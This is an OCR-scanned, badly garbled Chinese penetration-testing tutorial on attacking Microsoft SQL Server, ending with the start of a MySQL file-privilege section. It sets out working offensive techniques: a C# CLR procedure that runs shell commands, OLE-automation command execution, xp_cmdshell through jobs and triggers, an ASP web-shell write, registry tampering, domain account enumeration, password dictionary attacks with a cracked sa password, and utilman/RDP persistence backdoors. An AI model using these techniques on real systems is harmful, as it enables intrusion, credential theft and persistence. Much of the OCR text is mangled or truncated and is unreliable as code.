[Microsoft.SglServer.Server.SqlProcedure] 


\Sys 
public static void cmd_exec (SqlString execCommand) 


Process proc = new Process(); 

proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; 
proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Valt 
proc.StartInfo.UseShellExecute = false; 
proc.StartInfo.RedirectStandardOutput = true; 


proc.Start(); 


// Create the record and specify the metadata for the columns. 


SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", Sc 
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// Mark the beginning of the result set. 


SqlContext .Pipe.SendResultsStart(record) ; 


// Set values for each column in the row 






record.SetString(0, proc. StandardOutput .ReadToEnd().ToString() 


// Send the row back to the client. 


SqlContext.Pipe.SendResultsRow(record); 


// Mark the end of the result set. 


SqlContext.Pipe.SendResultsEnd(); 


proc.WaitForExit(); 


proc.Close(); 


H 


C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library ceu 


得 到 的 DLL 上 传 到 目标 ， 设 置 dl 文件 权限 ， 和 否则 mssql 可 能 因为 文件 权限 问题 导致 读 取 dl 失败 
开启 CLR 
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~ . » * * 
» configure 'show advanced options',1 


.- Enable clr on the server 
sp configure ‘clr enabled',1 


ECONFIGURE 


限 问题 ， 需 要 设置 数据 库 拥有 者 为 Sa， 这 个 方法 不 能 使 用 master 数 据 库 来 执行 查询 语句 


alter database [数据 库 名 ] set TRUSTWORTHY on 


EXEC sp changedbowner 'sa' 


c Import the assembly 

“CREATE ASSEMBLY my_assembly 

“FROM "c:\temp\cmd_exec.d1l' 

ms PERMISSION SET - UNSAFE; 

co 

L. Link the assembly to a stored procedure 

; CREATE PROCEDURE [dbo].[cmd exec] @execCommand NVARCHAR (4000) AS EXTERNAL NA 


GO 


下 来 就 可 以 执行 命令 了 
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DELUSEY 3 T n POAT SL 120 (1277 JJ A 


cmd exe whoa -— 





























100% >~ 
梧 结果 |) 消息 


output 




































































1 int service\mssqlserver | 
| ——————— ——Ó 








这 个 方法 还 可 以 通过 16 进 制 文 件 流 的 方式 导入 DLL， 这 样 可 以 不 用 文件 落地 ,参考 
























































D: http://sekirkity.com/requested-ci 
1. com 对 象 
开启 
































EXEC sp configure 'Ole Automation Procedures',1 
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-~ » Pom 
declare @dbapp int,@exec int,Qtext int,@str varchar(8000); 


exec sp_oacreate "{72C24DD5 -D70A- 438B-8A42-98424B88AFB8}',@dbapp output; 
--exec sp oamethod @dpapp, 'run',null, 'calc.exe'; 


exec sp oamethod @dbapp, 'exec',@exec output, 'C:\\windows\\system32\\cmd.exe / 
exec sp oamethod @exec, 'StdOut', Qtext out; 
exec sp oamethod Qtext, 'readall', Qstr out 


select Qstr 


~ EXEC xp .regread 'HKEY CURRENT USER',' Control Panel\International', 'sCountry' 


. EXEC Xp regread 'HKEY CURRENT USER'.'Control PanelMInternational'.' sCountry’ 


[AR 消息 
Value Data 
华人 民 共 和 国 


L. 删除 操作 
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~ » 


exec master.xp regdeletevalue 'HKEY LOCAL MACHINE',' 


SOFTWARE/Microsoft/Windows/CurrentVersion', 'TestValueName' // 删 除 值 


exec 
master.xp regdeletekey 'HKEY LOCAL MACHINE’, ' 


SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey' //HIBRBE 


1. 添加 值 


EXECUTE master..xp_regaddmultistring 
@ rootkey ='HKEY_LOCAL_MACHINE', 

@ key ='SOFTWARETest', 

@ value name ='TestValue', 


@ value ='Test' 


1. 枚 举 可 用 的 注册 表 键 


EXEC master..xp regenumkeys 'HKEY_CURRENT_USER', 'Control Panel\International 


mb et gone = 一 


EXEC master..xp regenumkeys 'HKEY CURRENT USER'.'Control Panel\International’ 


100% ~ 
结果 7a 消息 3 
SubKeyName 





2 Vser Profile | 
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B cc 


f =- 
定时 任务 
sgl server 人 代理， 右键 -新 建 -作业 


ev 十 
+ a 系统 数据 库 

上 ORERE 

j * |j ReportServer 

~ |] ReportServerTempDB 





Ea |j test 

Bia set 

í + L3 服务 器 对 急 

图 La mel 

| Dg AlwaysOn 高 可 用 人 性 

* 4 管理 

w [ Integration Services 目录 

新 建 (N) , Fel ()... 
SiS HSU) » 计划 (S).。 
mu ^C ERO). 
FET ERA) 
BF BMA) 
mz) PowerShell(H) 
TRO) » 
RISHA) 
tR) 
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a En mer 


aan —— 
Ll. Sua» Da 


EET EN FAEERE QD 


5. € 类 型 


连接 
服务 器 : 
WIN-OGIVDLEATO? 
EH 


EU. BIER / TASR): 
就 绪 è + 


ggwn | 


配置 执行 的 语句 ， 可 以 自 定义 
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E x 
k 


——— 
Ses Cyan 





ERIS): qe. usu 


test 


类 型 (T): 3 
m aa RIE (T-SQL) | y TRES m n 
运行 身份 (R): 


数据 库 (D): 


‘test 





命令 Q0: exec xp. emdshell ERS $$$ 


I OGIVDLEAT92 





| 
| 
| 
k 
BE 








在 “计划 "选项 里 配置 执行 时 间 
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选择 页 pat 
TOR 3 
À oR 
aa 二 WD 
cg 
= E 计划 类 型 (S) EER ~ V ERRE) 
"x 
RTO 5A J 
thief Go ! > 周 , 在 
[星期 一 00) 星期 三 (0) | 星期 五 (F) EMO 
连接 星期 二 (T) SHAH) v SMB n 
服务 器 SIME 
WIN-OGIVDLEATO2 
ET © 执行 一 次 ,时 间 为 (A} — (0:00.00 : 
ERTA WTE Los 
| 结束 时 间 (6) 
i ze naa 
N sth 
\| Fa A ih OO) 2019/ 9/ 6 . 结束 日 期 {(E) 
| * 无 结束 日 期 (0) 
| 
| 摘要 
Il SESSCESTS amo) (trf MAE 的 0.00 00 执行 。 将 从 501879/6 开始 使 用 计划 
| ae | m 
| | 
| 此 外 ， 可 以 使 用 十 六 进 制 CLR 新 建 一 个 存储 过 程 然 后 用 计划 作业 执行 存储 过 程 ， 这 样 更 加 隐蔽 。 
I| 
| | 1. 触发 器 
M 
| 触发 器 用 于 在 执行 指定 语句 动作 之 后 执行 Sql 语句 ， 如 update, 可 配合 注入 使 用 
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“SET ANSI_NULLS ON 







SET QUOTED_IDENTIFIER ON 
| 60 


CREATE TRIGGER [test222] 


ON [test] 
AFTER UPDATE /建立 一 个 作用 于 表 test 的 、 
类 型 为 After Update 的、 名 为 test222 的 触发 器 */ 
L. 
| BEGIN 


EXECUTE MASTER.DBO.XP CMDSHELL 'cmd.exe /c calc.exe' 


判断 文件 是 否 存在 


EXec xp_fileexist "C:\\users\\public\\test.txt" 


可 0 表示 文件 不 存在 ，1 表 示 存 在 。 在 执行 无 回 显 命令 时 ， 把 执行 结果 重 定向 到 一 个 文件 ， 再 用 
ifileexist 判 断 该 文件 是 否 存在 ， 就 可 知道 命令 是 否 执行 成 功 。 
- 列 目录 


exec xp subdirs "C:\Users\Administrator\", 2,1 
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第 一 个 参数 设 定 要 查看 的 文件 夹 。 第 二 个 参数 限制 了 这 个 存储 过 程 将 会 进行 的 递归 级 数 , 
或 所 有 级 别 。 第 三 个 参数 告诉 存储 过 程 包括 文件 。 默 认 是 零 或 只 对 文件 夹 ， 数 值 1 代表 
的 文件 。 


exec xp_dirtree 2,1 


0% = 


JAR gm 
subdirectory depth file 
l os cce 
j LocalLow 
l Roaming 
D Application Data 
j Contacts 
Cookies 
if Desktop 
à cmd exec. cs 
en sql server 2012 developer edition x86 x64 dv 
mioledbsql 18.2.2 0 x64 msi 


r 


~ Documents 
My Music 
My Pictures 
My Videos 
SQL Server Management Studio 
Visual Studio 2010 
Downloads 
Favorites 
Links 
Links 
Desktop. lnk 
Downloads. Ink 
RecentPlaces. Ink 
Local Settings 
Music 
My Documents 
NetHood 


1. 写 文 件 


= æ c æ NN Moe Moe 9 ONY HS NY NH KL NN NY o Mo — Re NN HY 一 
Oo0005 - —— 00000057508 OQO0|—- ——dcG oooooo 


$346 uU x U HS C GO o o -. DTD ew NH Oo 


[U 
exec sp makewebtask 'c:NwwwNtestwr.asp','select''«*Xexecute(request("SB"))9? ^ 


需要 开启 Web Assistant Procedures 


exec sp configure 'Web Assistant Procedures', 1; RECONFIGURE 


在 sql server 2012 FF BAM. 
1. 创建 目录 
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A ~ ! * ET 
ic Xp create subdir 'D:\test' 


epemakecab 'c:test.cab', 'mszip', 1, 'cttest.txt' | e:test1. txt ' 


你 指定 一 列 你 想 压缩 的 文件 还 有 你 想 放 进去 的 cab 文件 。 它 甚至 允许 你 选择 默认 压缩 ， 
压缩 ( 类 似 于 .zip 文 件 格式 ) 或 不 压缩 。 第 一 个 参数 给 出 到 cab 文件 的 路 径 ， 这 是 你 想 创 建 
文件 的 地 方 。 第 二 个 参数 是 压缩 级 别 。 如 果 你 想 使 用 详细 的 日 志 记 录 就 使 用 第 三 个 参数 。 第 
数 后 跟着 你 想 压 缩 的 文件 的 名 称 。 可 以 在 扩展 存储 过 程 里 传 多 个 要 压缩 的 文件 名 称 。 


exec xp_getnetname 


获取 系统 信息 


exec xp_msver 
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exec xp_msver 








My Ll , E: 

100% ~ 
-结果 |) 消息 

Ind Name Internal Value — Character Value 
1 11 ProductName NULL Microsoft SQL Server 
2 ” ProductVersion 720896 11.0.2100. 60 
3 Language 2052 中 文 ! 简 体 ， 中 国 } 
4 Platform NULL NT x64 
5 Comments NULL SQL 
6 CompanyName NULL Microsoft Corporation 
7 FileDescription MILL SQL Server Windows NT ~ 64 Bit 
8 FileVersion NULL ?011.0110.2100.060 ((SQLI1 RTN).120210-1917? ) 
9 Internal¥ame NULL SQLSERVR 
10 10 LegalCopyri ght NULL Microsoft Corp. All rights reserved 
11 11 LegalTr ademarks NULL Microsoft SQL Server is a registered trademark 
12 12 Ori ginalFilename NULL SQLSERVER. EXE 
13 13 PrivateBuild WILL NULL 
fay SOT ETE UY 137625660 NULL 
15 15 Windows ¥ersion 602831718 6.2 (9200) 
16 16 ProcessorCount 1 1 
17 17 ProcessorActiveMask NULL 1 
18 18 ProcessorType 8664 NULL 
19 19 Physi calMemory 2047 2047 (2146877440) 
20 20 Product ID NULL NULL 


1. 获取 驱动 器 信息 


exec xp fixeddrives 
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oc xp_fixeddrives 


iR AS 
drive MB 可 用 空间 
ic | 37163 


获取 域名 
~ SELECT DEFAULT DOMAIN() as mydomain; 


ÉSELECT DEFAULT DOMAIN() as mydomain 


1 遍历 域 用 户 
取 RID 


SELECT SUSER_SID('CATE4CAFE\Domain Admins') 
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SELECT SUSER_SID C CATE4CAFE\Domain Admins’ 
kos 


» 
100% ~ 
AR 5 消息 
(无 列 名 ) 
1 | OxO10500000000000515000000F0F5 7B63AF32D50A0916B 700020000 E 





利用 RID 前 48 位 即 0x010500000000000515000000F80F57B63AF32D50A0916B7B 构 造 SID 即 
历 域 用 户 。 我 们 知道 ， 域 用 户 的 SID 是 从 500 开 始 ， 所 以 把 500 转 换 成 16 进 制 ， 为 01F4， 在 mssg 
需要 翻转 为 F401， 然 后 用 0000 补 足 得 到 
0x010500000000000515000000F80F57B63AF32D50A0916B7BF4010000， 在 mssql 里 查询 


SELECT ER SNAME Ox0105000000000005 1 5000000F S0F57B634F 32D5040916B7BF 4010000 | 





采用 循环 SQL 语句 遍历 即 可 遍历 出 所 有 域 用 户 。 或 者 使 用 


-遍历 
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users SERT DESEE Getsqiserver-Enum-winAccounts -SQLServerInstance "192.168.0.6" -sqluser sa -SqlPass 
FuzzNum 
attempting to authenticate to 192.168.0.6 as the login sa... 
ted 
cnumerating domain... 
ain found: CATEACAFE 
enumerating domain SID... 
pomain SID found: 0 000000005 15000000F 80F 57B63AF 32D50A0916878 
Brute forcing 1 
CATE4SCAFE \Administrator 
CATESCAFE \Gues 
CATE4CAFE \krbtgt 
TEACAFE\Domain Guests 
CATEACAFENDomain Computers 
CATE4CAFE\Domain Control] 
ATEACAFENCert Publishers 
chema Admins 
( nterprise Admins 
ATE4CAFE\Group Policy Creator Owners 
ATEACAFENRead-only Domain Controllers 
ATEACAFE\Cloneable Domain Controllers 
ATEACAFENProtected Users 
CATE4CAFE\RAS and IAS Servers 
ATEACAFENAllowed RODC Password Replication Group 
CATEACAFENDenied RODC Password Replication Group 
ATE4CAFE\Domain Computers 
ATEACAFENWi nRMRemoteWMIUSers 
CATEACAFE\cate4cafe 
ATEACAFENWIN-6BCSA1ED2BP $ 
ATE4CAFENDomain Controllers 
CATESCAFE\Dns Admins 
CATE4CAFE \DnsUpdateProxy 
ATEACAFE\mssql 
ATE4SCAFE MSSQL $ 
ATE4CAFE\Cert Publishers 
ATEACAFE\Schema Admins 
ATEACAFE\Enterprise Admins 
ATE4CAFE\Group Policy Creator Owners 
ATE4CAFE\Read-only Domain Controller 
ATE4CAFENCloneable Domain Controllers 
ATEdCAFENProtected Use 
lomain accounts groups were found 





msf 有 个 模块 可 通过 注入 点 枚 举 域 用 户 


use admin 
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攻击 MSSQL--PowerUpSQL 介 绍 


PowerUpSQL 是 NETSPI 开 源 的 针对 MSSQL 的 攻击 套件 ， 包 含 发 现 网 络 中 mssql、 RS IRE a 
用 mssdql 获 得 持久 权限 以 及 利用 mssql 攻 击 域 等 功能 。 项 目地 址 


发 现 MSSQL 实 例 


。 发 现 本 地 实例 


PS C: \Users \mssq!\Desktop\PowerUpSQL -master\PowerUpSQL -master> Get-SQLInstanceLocal 


yer (MSSQL SERVER) 
R 


ram Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr. exe. —suss 
ServiceAccount / ICAFE \mssql 
State > Running 


。 通过 SPN 查 找 域内 mssql 实 例 
S c:\Users\mssq] \Desktop\PowerUpSQL -masterNPowerUpSQL -master» Get-SQLInstanceDoma 


omputerName : mssql.cate4cafe.com 
Instance : mssql.cate4cafe. com,1433 
DomainAccountSid : 1500000521000248158718258243458016014510712382400 
DomainAccount : MSSQL$ 
DomainAccountCn  : MSSQL 
i > MSSQLSvc 
: MSSQLSvc/mssql!.cate4cafe. com: 1433 
2019/9/14 16:23 


Users\mssq!\Desktop\PowerUpSQL -master\PowerUpSQl-master> Get-SQLInstanceBroadcast -Verbose 
Attempting to identify SQL Server instances on the broadcast domain. 
SQL Server instances were found. 


Instance IsClustered Version 


M 11.0.2100. 60 
MSSQLNCATEACAFE 11.0;2100.60 


.\computers. txt | Get-SOLInstanceScanUDP 


: 192. 168. 0. 6 

: 192. 168. 0. G\MSSOLSERVER 
: MSSQLSERVER 

: 192. 168. 0. 6 

; 1433 

: 11.0. 2100, 60 

: No 


: 192. 168. 0.6 
; 192. 168. 0. 6\CATEACAPE 
> CATE4CAFE 
: 192. 168.0.6 
: 49174 
BaseVersion : 11.0. 2100.680. 
IsClustered + No 


接受 机 器 名 或 者 IP 
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攻取 MSSQL 信 息 


bis 


。 获取 配置 信息 


Jsers\mssql\Desktop\PowerUpSQL -mas ter\PowerUpSQL -mas ter> Get-SQLServerConfiguration 


MSSQL 

MSSQL 

access check cache bucket count 
0 

65536 

0 

0 


iterName : MSSQL 
tance : MSSQL 
: access check cache quota 
un s^ | 
num : 2147483647 
alue 0 
0 


g 


rName MSSQL 
MSSQL 
Ad Hoc Distributed Queries 
0 
1 
0 
0 


MSSQL 

MSSQL 

affinity 1/0 mask 
2147483648 
2147483647 

0 

0 


terName MSSQL 
tance > MSSQL 
; affinity mask 
un : -2147483648 
num : 2147483647 
g value : 0 
lue ant 


puterName : MSSQL 
tance HN MSSQL 
: affinity64 1/0 mask 
num : -2147483648 
num : 2147483647 
: «i. f) 


。 获取 服务 信息 


C:\Users\mssq1\Desktop\PowerUpSQL -mas ter\PowerUpSQL -master> Get-SQLInstanceLocal | Get-SQLServerInfo 


puterName > MSSQL 
istance : MSSQL 
mainName : CATE4CAFE 
viceProcessID : 2752 
viceName : MSSQLSERVER 
»erviceAccount : CATE4CAFE\mssql 
é thenticationMode : Windows and SQL Server Authentication 
ForcedEncryption : 0 
‘ustered : No 
QLServerVersionNumber : 11.0.2100.60 
-QLServerMajorVersion : 2012 
ServerEdition : Developer Edition (64-bit) 
PüLServerServicePack : RTM 
"SArchitecture s 
)SVers ionNumber. MUN o 
"rentlogin : CATE4CAFENmissqj 
SSysadmin : NO 
ACti veSessions ww 





PS C:\Users\mssq!\Desktop\PowerupSQL -masterNPowerUpSQL -master» Get-SQLSe,,,. "e 


.omputerName 
instance 
Principalid 


PrincipalName : 


Principalsid 


PrincipalType : 


reateDate 
IIsLocked 


omputerName 
Instance 
Principalid 
PrincipalName 
PrincipalSid 
PrincipalType 

reateDate 
TsLocked 


omputerName 
Instance 
Principalid 


PrincipalName : 
: 0106000000000009010000000 26 3F 7F4DA7 SAF O9ASFAGEF 520047 ACAB227c 4; 
: CERTIFICATE MAPPED LOGIN 


Principalsid 

PrincipalType 
reateDate 

IsLocked 


omputerName 
instance 
PrincipalId 


PrincipalName : 
: 0106000000000009010000007 AB272382AD549D4A6564ADE8B1CA3DCDF 2D6C 86 
: CERTIFICATE. MAPPED LOGIN 


Principalsid 

PrincipalType 
reateDate 

IsLocked 


爆破 口令 


: MSSQL 
> MSSQL 


1 


sa 

1 

SQL_LOGIN 
AR 9:10:35 


: MSSQL 
> MSSQL 


101 


: ##MS SQLResourceSigningCertificate## 
: 0106000000000009010000005F22FBA9F9DFC977 
: CERTIFICATE_MAPPED_LOGIN 


2012/2/10 21:00:38 


: MSSQL 
: MSSQL 


102 
##MS_SQLReplicationSigningCertificate## 


2012/2/10 21:00: 38 


: MSSQL 
: MSSQL 


103 
##MS_SQLAuthenticatorcertificate## 


2012/2/10 21:00: 38 


。 获取 默认 密码 实例 


作者 在 脚本 中 提供 了 默认 安装 的 一 些 实例 名 和 默认 密码 ， 但 是 
Express (避免 账号 





锁定 ) 。 可 以 根据 自身 需要 加 入 自 定义 的 账号 
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7 32E2CC31CCAD1C9BEED/7CA 





不 包括 MSSQLSERVER 和 SQL 
密码 





nDefaultPw 


\CATEACAFE 


PL<Ookm 


cers \mssq! \Desktop\PowerUpSQl -master\PowerUpSQL -master> Get-SQLInstanceBroadcast | Get-SQLConnectionTestThreade 
Xke-sQLAuditweakLoginPw -Verbose -UserFile .Nuser.txt -PassFile .\passwd. txt 
N ) START VULNERABILITY CHECK: Weak Login Password 
CONNECTION SUCCESS. 
Getting logins from file 
Getting supplied login. 
Enumerating principal names from 10000 principal IDs 
Getting password from file... 
Performing dictionary attack 
successful Login: User sa (Sysadmin) Password ^L «Ookm 
Failed Login: User sa Password sa 
COMPLETED VULNERABILITY CHECK: Weak Login Password 
START VULNERABILITY CHECK:. Weak Login Password 
CONNECTION. SUCCESS. 
zetting logins from fite. 
etting supplied login 
numerating principal names from 10000 principal 1Ds 
Getting password from file 
Performing dictionary attack... 
successful Login: User sa (Sysadmin) Password <0okm 
Failed Login: User Sa Password Sa 
COMPLETED VULNERABILITY CHECK: Weak Login Password 
CATE AC AFE START VULNERABILITY CHECK: Weak Login Password 
CATE4CAFE * CONNECTION FAILED. 
CATEACAFE COMPLETED VULNERABILITY CHECK: Weak Login Password. 


MSSQL 
HE MSSQL 
bility : weak Login Password 
ption : One or more SQL Server logins is configured with a weak password. This may provide unauthorized access 
to resources the affected, logins have access to 
tion : Egyre all SQL Server logins are required to use a strong password. Consider inheriting the OS password 
policy. 


nerable 
oitable 
ted 
cmd Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit. 
: The sa (Sysadmin) is configured with the password | PL«Ookm. 
ence > https: //msdn, microsoft. com/en-us/library/ms 161959. aspx 
2i t Scott Sutherland (@ nullbind), NetsPI 2016 


命令 的 含义 是 通过 管道 爆破 可 以 连接 的 发 现 的 实例 。 此 试 通过 Invoke- 
SQLOSCmd 执 行 命令 


Users\mssq]\Desktop\PowerUpSQl -masterNPowerUpSQL-master» Invoke-SQLAuditweakLoginPw -Verbose -Instance MSSQL -User| 
user.txt -PassFile .\passwd.txt | Invoke-SQLAudj;tweakLoginPw -Verbose -Exploit 
S: MSSQL : START VULNERABILITY. CHECK: Weak Login Password " 
M : CONNECTION SUCCESS. a 
Getting logins from file... 1 
Gétting supplied lagin..; 
Getting list of Jogins... 
Getting password from file... 
M 5 Performing dictionary attack... 
MSSQL Successful Login: User = sa (Sysadmiri) Password = .PL«Üokm 
MSSQL Failed Login: User = ##MSPolicyEventProcessingLogin## Password -..PL«Ookm 
MSSQL = Failed Login: User ##MS. PolicyTsqlExecutionLogin£&& Password: =» PL<Ookm 
faitedi Login: User sd Password = Sa 
Failed Login: User ##MS_PolicyEventProcessingLogin## Password = ##MS_PolicyEventProcess ingLogin## 
Failed Login: User = ##MS_PolicyTsqlExecutionLogin## Password ##MS_PolicyTsqlexecutionLogin## 
M : COMPLETED VULNERABILITY CHECK: Weak Login Password 
MSSQL : START VULNERABILITY CHECK: Weak Login Password 
MSSQL: CONNECTION SUCCESS. 
xq Getting supplied login... 
- Getting list of logins... 
- Performing dictionary attack... 
Failed Login: User = sa Password) = sa i 
Failed'Login: User = ##MS_PolicyEventProcessinglLogin## Password = PMS PolicyEventProcessingLogin## 
Failed Login: User = ##MS_PolicyTS@lExecutionLogin## Password = ##MS_PolicyTsqlexecut iont ogin## 
= MSSQL- COMPLETED VULNERABILITY CHECK: Weak Login Password 
"Ren aed a EOP A uRwerOBSO!: | mas EER Ve OMe DP oes Er Invoke-SQLOSCmid -Verbose -Instance MSSQL -Command "whoami 
sults ` 
: Creating runspace pool and session states 
MSSQL A Connection Success. sie 
MSSQL vog area sysadmin. i & 
MSSQL. ;'Show; Advanced Options is disabled 
MSSQL *-Enabled Show Advanced Options. 
:Jxp-emdshell is disabled.” 
Enabled xp cmdshell. =", 
:jRudaning Command: whoami 
Disabling xp.cmdsheTl 3 
isab] ng Show Advanced Options" 


> 


‘tedcafe\mssql 


MAIS 






































持久 性 "um 


。 启用 存储 过 程 
在 SQL Server 启 动 时 添加 数据 库 管 理 账户 








Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "MSSQL29| 


添加 windows 管 理 员 


Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "MSSQL200 


执行 powershell 命 令 


Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "MSSQL2008 


。 写 注册 表 


Get-SQLPersistRegDebugger -Verbose -FileName utilman.exe -Command 'c:\window 


RDP 后 门 。 需 要 当前 mssql 用 户 有 写 注册 表 权 限 
。 作业 


1 [1(.7img/20190914202842 .png) 


出 了 CMD， 还 支持 VBScript、powershell、JScript 


此 外 ， 工 具 还 集成 了 一 些 通过 mssql 执 行 系统 命令 的 方式 
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4g 


lows\ 


获取 域 信息 


* 当前 域 用 户 信息 





根据 实际 情况 定义 触发 条 件 


qi\Desktop\PowerUpSQL -masterNPowerUpSQL -master» Get-SQLDomainAccountPolicy 


Connect 10: 


)b j 


+ Connection <$ 


Associati 
> LDAP quer 


n Succe 


2012 Developer Edition (64-bit) (11.0.2100.60) 


ect provider allowed to run ia proce 
| Link mode using OpenQueny. 
LoS link named mHpOFtrC. 


ng ‘CATESCAFE\mssql’ with ADSI SQU Server link named mHpOFtrC. 
y again logon £ ;er using ADSI OLEDB started. 


> Connectior 


i Removing 


7.0 records 


outthreshold 
koutduration ; 
outobservationwindow. : 


Ihistorylength 
k 


A E link named mHpOFtrc 
i logon server using ADSI OLEDB complete. 
were found. 


2 24 
; 0 
7 30 


30 


Dd 


enchanged 
nk 


Pe 

: 09/14/2019 05:16:56 i 

+ {LDAP://CN={31B2F340-016D-11D2-945F -00CO4FB984F9} , CN-Policies,CN-System,DC-catedcafe,DC 
0] 





com; 


samaccountname 
name 
aadmincount 
hencreated 
henchanged 
adspath 


amaccountname 
name 
laadmincount 

hencreated 

henchanged 
adspath 


amaccountname 
name 
admincount 

hencreated 

henchanged 
adspath 


amaccountname 
name 
admincount 

hencreated 

henchanged 
adspath 


amaccountname 
name 


。 组 


Connection Succ 
Login: CATE4C 
Domain: CA 


DesktopNPowerUpSQL -master\PowerUpSQL -master> Get-SQLDomainUse, 


Version: e ~ 2012 reloper Edition (64-bit) (11.072100 g&n 


sysadmin: Yes 

ADsDSOObject provider to run in process: Yes 
Executing in Link mode using OpenQuery. 

Creating ADSI SQL Server link named adKZovwi. 

Connection Success. 

Associating 'CATE4CAFE\mssql' with ADSI SQL Server link named 
LDAP query against logon server using ADSI OLEDB started... 
Connection Success. 

Removing ADSI Server link named adKZovwi 

LDAP query against logon server using ADSI OLEDB complete. 
6 records were found. 


Administrator 

Administrator 

1 

2019/9/6 5:10:5 

2019/9/ 
: //CATE4CAFE/CN=Administrator ,CN=Users , DC=cate4cafe, DC=com 


cate4cafe 

cate4cafe 

] 

2019/9/6 5:10:58 

2019/9/6 5: 

LDAP: //CATE4CAFE/CN=cate4cafe,CN=Users ,DC=cate4cafe ,DC=com 


krbtgt 
krbtgt 


/6 5:12:01 


/6:5:27:10 
-ATEA4CAFE/CN-krbtgt ,CN=Users ,DC=cate4cafe,DC=com 
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Nisers ns sat Ee eer eee: masterNPowerUpSQL-master» Get-SOLDomainGroup 
MSS Connection Success. 
: Login: CATE4CAFE\mssq] 
Domain: CATEACAFE 
Version: SQL Server 2012 Developer Edition (64-bit) (11.0.2100.60) 
Sysadmin: Yes 
: ADsDSOObject provider allowed to run in process 
SEAL : Executing in Link mode using Openquery. 
MSSQL : Creating ADSI SQL Server link named cDsnyClm. 
MSSQL : Connection Success. 
MSSQL : Associating 'CATEACAFENmssql' with ADSI SQL Server link named cDsnyC m. 
MSSQL : LDAP query against logon server using ADSI OLEDB started 
s : Connection Success. 
4 : Removing ADSI SQL Server ljnk named cDsnyC|m 
MSSQL : LDAP query against logon server using ADSI OLEDB complete. 
MSSQL : 47 records were found. j 


countname : WinRMRemoteWMIUsers... 


Count : 
‘created : 2019/9/6 5:10:58 
changed : 2019/9/6 5:10:58 
path : LDAP: //CATEACAFE /CN-WinRMRemoteWwMIUsers | ,CN-Users,DC-catedcafe,DC-com 


iccountname : Administrators 

nCount pa | 

created : 2019/9/6 5:10:58 

changed : 2019/9/6 5:27:10 

ath : LDAP: //CATEACAFE /CN-Administrators,CN-Builtin,DC-cate4cafe,DC-com 


ccountname ; Users 
incount Y 
ncreated : 2019/9/6 5:10:58 
enchanged > 2019/9/6 5:12:01 
path : LDAP: //CATE4CAFE/CN=Users , CN-Builtin,DC-catedcafe,DC-com 


ccountname : Guests 
inCount É 
ncreated : 2019/9/6 5:10:58 
enchanged > 2019/9/6 5:12:01 
spath : LDAP: //CATE4CAFE/CN=Guests ,CN=Bui Itin, DC=cate4cafe,0C=com 


2rs\mssq1\Desktop\PowerUpSat -masterNPowerÜpSQL -mas ter> Get-SQLDomainComputer -Instance MSSQL -Verbose -Linküsert 
cafe\mssql’ -LinkPassword '. PL«Ookm" 
E Connect ion Success. 
Login: CATEACAFE WIS Sq 
: Domain: CATEACAFE 
> Version: SQL Server 2012 Developer Edition (64-bit) (11.0.2100.60) 
Sysadmin: Yes 
ADSDSOObject provider allowed to run din process: Yes 
> Executing in Link mode using Openquery, 
: Creating ADSI SQL Server link named kqPbpehL. 
> Connection. Success. 
Associating login 'cate4cafeWnssql' with ADSI SQL Server link named kqPDpeht 
: LDAP query agai Tash $e r using ADSI OLEDB started. 
: Connection Succ 5 
: Removing ADSI SQL Server link named kqPDpeht 
LDAP query against logon server using ADSI OLEDB complete. 
3 records were found. 


1 accountname z WIN-6BCSALED2BP$ 
hostname : WIN-6BCSAIED2BP.cate4cafe.com 
ratingsystem t Windows Server 2012 R2 Datacenter 
ratingsystemversion ::6.3 (9600) 
ratingSystemServicePack : 
ncreated : -2019/9/6 5:12:00 
enchanged 1 °2019/9/6 5:17:45 
'spath : LDAP: //CATEACAFE /CN=WIN~6BCSALED2BP ,OU=Domain Controllers ,DC=cate4cafe,DC=com 


imaccountname > MSSQL$ 
nshostname MsSsq1.cate4cafe.com 
cratingsystem : Windows Server 2012 R2 Datacenter 
atingsystemversion 176.3 (9600) 
atingSystemServicePack. : 
"encreated = 2019/9/6 5:33:18 
enchanged + 2019/9/14 8:46:02 
path ; UDAP: //CATEÁACAFE /CN=MSSQL ; CN-Computers , DCscatedcafe,DC-com 


‘ccountname ;" WIN10$ 
‘os tname 2 winl0. cate4cafe.com 

Ingsys tem t Windows 10 专业 版 
'atingsystemversion" 710.0 (17763) 

tingSystemsenvicePack ": 
‘created : :/2019/9/14 6:35:28 
: Bo : ::2019/9/14 6:36:43 

LDAP: //CATEACAFE /CNSWINIO,CN-COmputers,DC-cate4cafe,DC-com 


参数 ， 或 者 查看 项 目 wiki 











































































































































































































































































































如 何 利用 Mysql 安 全 特性 发 现 漏洞 
前 言 


在 渗透 测试 时 ， 面 对 Mysql 环 境 ， 需 要 用 到 load_file 与 into outfile 时 ， 会 发 现 无 法 使 用 oad file 
不 到 系统 文件 、 同 时 into outfile 也 无 法 写 入 后 门 进行 getshell， 这 时 候 就 有 必要 了 解 下 Mysql 
特性 secure_file_priv 变 量 安 全 配置 。 此 变量 用 于 限制 数据 导入 和 导出 操作 ， 执 行 的 效果 LOAD 
和 SELECT...INTO OUTFILE 报 表 和 LOAD_FILE() 功 能 。 仅 允许 具有 此 FILE 权 限 的 用 户 执 行 这 
作 。 









—. Mysql 权限 


1. 管理 权限 使 用 户 能 够 管理 MySQL 服 务 器 的 操作 。 这 些 权 限 是 全 局 的 ， 因 为 它们 不 是 特定 于 下 
数据 库 的 。 


2. 数据 库 权 限 适用 于 数据 库 及 其 中 的 所 有 对 象 。 可 以 为 特定 数据 库 或 全 局 授予 这 些 权限 ， 以 
们 适用 于 所 有 数据 库 。 


3. 可 以 为 数据 库 中 的 特定 对 象 ， 数 据 库 中 给 定 类 型 的 所 有 对 象 ( 例 如， 数据 库 中 的 所 有 表 ) 或 
局 的 所 有 对 象 授予 数据 库 对 象 (如 表 ， 索 引 ， 视 图 和 存储 例 程 ) 的 权限 。 所 有 数据 库 中 给 定 
型 的 对 象 。 


Z, load file 函数 用 法 

